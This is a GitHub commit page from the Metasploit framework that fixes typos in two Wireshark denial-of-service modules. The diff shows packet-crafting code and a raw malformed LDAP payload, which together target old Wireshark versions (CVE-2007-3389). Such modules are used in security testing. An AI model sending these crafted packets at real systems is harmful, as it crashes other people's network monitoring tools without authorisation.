Skip to content

Commit 8d1c718

Browse files
David MaloneyDavid Maloney
authored andcommitted
Land rapid7#7572, wireshark dos typos
Lands mcantoni's pr for fixing typos in the wireshark dos modules
2 parents 4596785 + 30f7006 commit 8d1c718

File tree

2 files changed

+8
-8
lines changed

2 files changed

+8
-8
lines changed

modules/auxiliary/dos/wireshark/chunked.rb

Lines changed: 7 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -17,13 +17,13 @@ def initialize(info = {})
1717
Wireshark crash when dissecting an HTTP chunked response.
1818
Versions affected: 0.99.5 (Bug 1394)
1919
},
20-
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
20+
'Author' => ['Matteo Cantoni <goony[at]nothink.org>'],
2121
'License' => MSF_LICENSE,
2222
'References' =>
2323
[
24-
[ 'CVE', '2007-3389'],
25-
[ 'OSVDB', '37643'],
26-
[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394'],
24+
['CVE', '2007-3389'],
25+
['OSVDB', '37643'],
26+
['URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394'],
2727
],
2828
'DisclosureDate' => 'Feb 22 2007'))
2929

@@ -42,13 +42,13 @@ def run
4242

4343
p = PacketFu::TCPPacket.new
4444
p.ip_saddr = datastore['SHOST'] || Rex::Socket.source_address(rhost)
45-
p.ip_daddr = dhost
45+
p.ip_daddr = rhost
4646
p.tcp_dport = rand(65535)+1
47-
n.tcp_ack = rand(0x100000000)
47+
p.tcp_ack = rand(0x100000000)
4848
p.tcp_flags.psh = 1
4949
p.tcp_flags.ack = 1
5050
p.tcp_sport = datastore['SPORT'].to_i
51-
p.tcp_window = 3072
51+
p.tcp_win = 3072
5252

5353
# The following hex blob contains an HTTP response with a chunked-encoding
5454
# length of 0. The ASCII version is below in a block comment.

modules/auxiliary/dos/wireshark/ldap.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -49,7 +49,7 @@ def run
4949
p.tcp_flags.syn = 1
5050
p.tcp_flags.ack = 1
5151
p.tcp_dport = datastore['RPORT'].to_i
52-
p.tcp_window = 3072
52+
p.tcp_win = 3072
5353
p.payload = "0O\002\002;\242cI\004\rdc=#{m},dc=#{m}\n\001\002\n\001\000\002\001\000\002\001\000\001\001\000\241'\243\016"
5454
p.recalc
5555
capture_sendto(p, rhost)

0 commit comments

Comments
 (0)